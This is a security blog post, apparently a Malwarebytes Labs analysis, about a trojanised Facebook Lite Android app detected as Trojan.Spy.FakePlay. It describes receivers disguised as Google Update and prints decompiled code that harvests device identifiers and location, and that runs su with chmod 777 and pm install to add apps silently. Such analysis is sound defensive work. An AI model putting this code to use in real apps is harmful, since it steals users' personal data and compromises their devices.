{"id":6868,"date":"2017-03-06T09:12:16","date_gmt":"2017-03-06T17:12:16","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/03\/06\/news-659\/"},"modified":"2017-03-06T09:12:16","modified_gmt":"2017-03-06T17:12:16","slug":"news-659","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/03\/06\/news-659\/","title":{"rendered":"Mobile Menace Monday: Facebook Lite infected with Spy FakePlay"},"content":{"rendered":"

Credit to Author: Nathan Collier| Date: Mon, 06 Mar 2017 16:00:28 +0000<\/strong><\/p>\n

A version of the popular mobile app Facebook has been found to be infected with what we detect as Android\/Trojan.Spy.FakePlay. \u00a0Facebook Lite is a more compact version of the popular app that uses less data and claims to work in all network conditions (i.e. where network conditions are poor).<\/p>\n

\"\"<\/p>\n

The infected Facebook Lite works as advertised, but with the addition of malicious activities. It does this by using a malicious receiver<\/a> com.google.update.LaunchReceiver<\/em> and service<\/a> com.google.update.GetInst<\/em>.\u00a0 Note the use of using a receiver and service name that attempts to hide under what some may think is Google Update; <\/em>something an untrained eye may not catch.<\/p>\n

Service com.google.update.LaunchReceiver<\/em> runs whenever the phone is booted, and immediately runs receiver com.google.update.GetInst.<\/em><\/p>\n

<\/p>\n

Log entry from Android Device Monitor<\/em><\/p>\n

Receiver com.google.update.GetInst <\/em>contains the bulk of the malicious code.\u00a0 Below are some chunks of code that steal personal information, and installs additional malicious apps.<\/p>\n

Code that steals and sends device ID, System Version, MAC address, Phone Model, Location, etc<\/em>:
WifiInfo localWifiInfo = ((WifiManager)getSystemService(\"wifi\")).getConnectionInfo();
<\/code>HashMap localHashMap = new HashMap();<\/code>
localHashMap.put(\"DeviceId\", paramTelephonyManager.getDeviceId());<\/code>
localHashMap.put(\"SystemVersion\", Build.VERSION.RELEASE);<\/code>
localHashMap.put(\"Mac\", localWifiInfo.getMacAddress());<\/code>
localHashMap.put(\"PhoneType\", Build.MODEL);<\/code>
localHashMap.put(\"NetworkOperatorName\", paramTelephonyManager.getNetworkOperatorName());<\/code>
localHashMap.put(\"SimSerialNumber\", paramTelephonyManager.getSimSerialNumber());<\/code>
localHashMap.put(\"Location\", a());<\/code><\/p>\n

Code to install additional apps:<\/em>
localProcess = Runtime.getRuntime().exec(\"su\");<\/code>
PrintWriter localPrintWriter = new PrintWriter(localProcess.getOutputStream());<\/code>
localPrintWriter.println(\"chmod 777 \" + paramString);<\/code>
localPrintWriter.println(\"export LD_LIBRARY_PATH=\/vendor\/lib:\/system\/lib\");<\/code>
localPrintWriter.println(\"pm install -r\u00a0 \" + paramString);<\/code>
localPrintWriter.flush();<\/code>
localPrintWriter.close();<\/code><\/p>\n

The literal meaning of Trojan<\/a> when it comes to computing is quote from Wikipedia any malicious computer program which is used to hack into a computer by misleading users of its true intent<\/em>.\u00a0 This particular piece of mobile malware is a perfect example; it misleads by infecting a legit app with malicious code and then hides its presence under the name of well-known corporation.<\/p>\n

This infected version of Facebook Lite originates from China based on characters found in the code. China does not have access to Google Play\u00a0and relies on third party apps stores that sometimes contain malicious apps like this.\u00a0 If you in a country that has access to Google Play, we suggest using it over third party apps stores to avoid such infections.\u00a0 Stay safe out there!<\/p>\n

Malicious MD5 samples:
5345429AB24BB132CFAACE51EFF63C84
628235E3C56651C72326D8F5C713DBC6<\/p>\n

The post Mobile Menace Monday: Facebook Lite infected with Spy FakePlay<\/a> appeared first on Malwarebytes Labs<\/a>.<\/p>\n

https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"

Credit to Author: Nathan Collier| Date: Mon, 06 Mar 2017 16:00:28 +0000<\/strong><\/p>\n\n\n\n
<\/a><\/td>\n<\/tr>\n
A lite version of the popular mobile app Facebook has been infected with Android\/Trojan.Spy.FakePlay.<\/p>\n

Categories: <\/p>\n